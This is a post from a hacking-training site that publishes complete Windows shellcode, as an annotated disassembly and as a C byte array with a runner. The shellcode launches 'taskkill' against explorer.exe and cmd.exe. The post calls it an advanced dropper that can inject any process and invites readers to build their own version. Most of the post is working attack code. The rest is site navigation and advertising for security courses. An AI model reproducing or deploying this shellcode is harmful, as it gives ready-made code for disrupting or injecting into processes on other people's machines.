ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label

Windows 8 Remote Explorer Kill with Shell Code Unknown rwxr-xr-x 0 3/05/2014

Filename Windows 8 Remote Explorer Kill with Shell Code
Permission rw-r--r--
Author Unknown
Date and Time 3/05/2014
Label
Action
Ethical Hacking Institute in Pune
./Arizona Team





























This post will elaborate how to take down a Explorer with help of shellcode. In CEH class we had created a dropper with exe extension, this is a more advance dropper that can be used to inject any process for the current example I have taken a explorer process.

The assembly logic flow is as below, this is a advance call to the same thing which was shown to you in buffer overflow class i.e the memory addresses of all the elements:

00401000 > $ 33F6           XOR ESI,ESI
00401002   . 33C9           XOR ECX,ECX
00401004   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
00401008   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
0040100B   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
0040100E   . 33DB           XOR EBX,EBX
00401010   > 43             INC EBX
00401011   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
00401014   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
00401017   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
00401019   . B8 11111111    MOV EAX,11111111
0040101E   . B9 14111111    MOV ECX,11111114
00401023   . 2BC8           SUB ECX,EAX
00401025   . 8BD1           MOV EDX,ECX
00401027   . 3BDA           CMP EBX,EDX
00401029   .^75 E5          JNZ SHORT messageb.00401010
0040102B   . B9 73311111    MOV ECX,11113173
00401030   . 2BC8           SUB ECX,EAX
00401032   . 03E9           ADD EBP,ECX
00401034   . 8BD4           MOV EDX,ESP
00401036   . B9 10211111    MOV ECX,11112110
0040103B   . 2BC8           SUB ECX,EAX
0040103D   . 2BD1           SUB EDX,ECX
0040103F   . B9 636D6420    MOV ECX,20646D63
00401044   . 890A           MOV DWORD PTR DS:[EDX],ECX
00401046   . B9 2F6B2074    MOV ECX,74206B2F
0040104B   . 894A 04        MOV DWORD PTR DS:[EDX+4],ECX
0040104E   . B9 61736B6B    MOV ECX,6B6B7361
00401053   . 894A 08        MOV DWORD PTR DS:[EDX+8],ECX
00401056   . B9 696C6C20    MOV ECX,206C6C69
0040105B   . 894A 0C        MOV DWORD PTR DS:[EDX+C],ECX
0040105E   . B9 2F696D20    MOV ECX,206D692F
00401063   . 894A 10        MOV DWORD PTR DS:[EDX+10],ECX
00401066   . B9 6578706C    MOV ECX,6C707865
0040106B   . 894A 14        MOV DWORD PTR DS:[EDX+14],ECX
0040106E   . B9 6F726572    MOV ECX,7265726F
00401073   . 894A 18        MOV DWORD PTR DS:[EDX+18],ECX
00401076   . B9 2E657865    MOV ECX,6578652E
0040107B   . 894A 1C        MOV DWORD PTR DS:[EDX+1C],ECX
0040107E   . B9 202F696D    MOV ECX,6D692F20
00401083   . 894A 20        MOV DWORD PTR DS:[EDX+20],ECX
00401086   . B9 20636D64    MOV ECX,646D6320
0040108B   . 894A 24        MOV DWORD PTR DS:[EDX+24],ECX
0040108E   . B9 2E657865    MOV ECX,6578652E
00401093   . 894A 28        MOV DWORD PTR DS:[EDX+28],ECX
00401096   . B9 31407711    MOV ECX,11774031
0040109B   . 2BC8           SUB ECX,EAX
0040109D   . 894A 2C        MOV DWORD PTR DS:[EDX+2C],ECX
004010A0   . 33DB           XOR EBX,EBX
004010A2   . 8BF4           MOV ESI,ESP
004010A4   . B9 65111111    MOV ECX,11111165
004010A9   . 2BC8           SUB ECX,EAX
004010AB   . 8D4E AC        LEA ECX,DWORD PTR DS:[ESI-54]
004010AE   . 51             PUSH ECX
004010AF   . 8D4E BC        LEA ECX,DWORD PTR DS:[ESI-44]
004010B2   . 51             PUSH ECX
004010B3   . 53             PUSH EBX
004010B4   . 53             PUSH EBX
004010B5   . B9 31131111    MOV ECX,11111331
004010BA   . 2BC8           SUB ECX,EAX
004010BC   . 51             PUSH ECX
004010BD   . 53             PUSH EBX
004010BE   . 53             PUSH EBX
004010BF   . 53             PUSH EBX
004010C0   . 52             PUSH EDX
004010C1   . 53             PUSH EBX
004010C2   . FFD5           CALL EBP
004010C4   . 33F6           XOR ESI,ESI
004010C6   . 33C9           XOR ECX,ECX
004010C8   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
004010CC   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
004010CF   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
004010D2   . 33DB           XOR EBX,EBX
004010D4   > 43             INC EBX
004010D5   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
004010D8   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
004010DB   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
004010DD   . B8 11111111    MOV EAX,11111111
004010E2   . B9 13111111    MOV ECX,11111113
004010E7   . 2BC8           SUB ECX,EAX
004010E9   . 8BD1           MOV EDX,ECX
004010EB   . 3BDA           CMP EBX,EDX
004010ED   .^75 E5          JNZ SHORT messageb.004010D4
004010EF   . B8 11111111    MOV EAX,11111111
004010F4   . B9 37261411    MOV ECX,11142637
004010F9   . 2BC8           SUB ECX,EAX
004010FB   . 03E9           ADD EBP,ECX
004010FD   . FFD5           CALL EBP


The embedded code is as follow, go through the code understand the logic and generate your own code remember you need your metasploit updated to replicate the scenario. If you have and problem in understanding you can shoot your query to instructor@arizonainfotech.com or you can get to us through our facebook page:

Code:
#include <iostream>
using namespace std;

char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";

int main(){printf("Shellcode Length is : %u\n",strlen(code));system("PAUSE");
    int (*_13)() = (int(*)())code; _13(); }

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune
 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan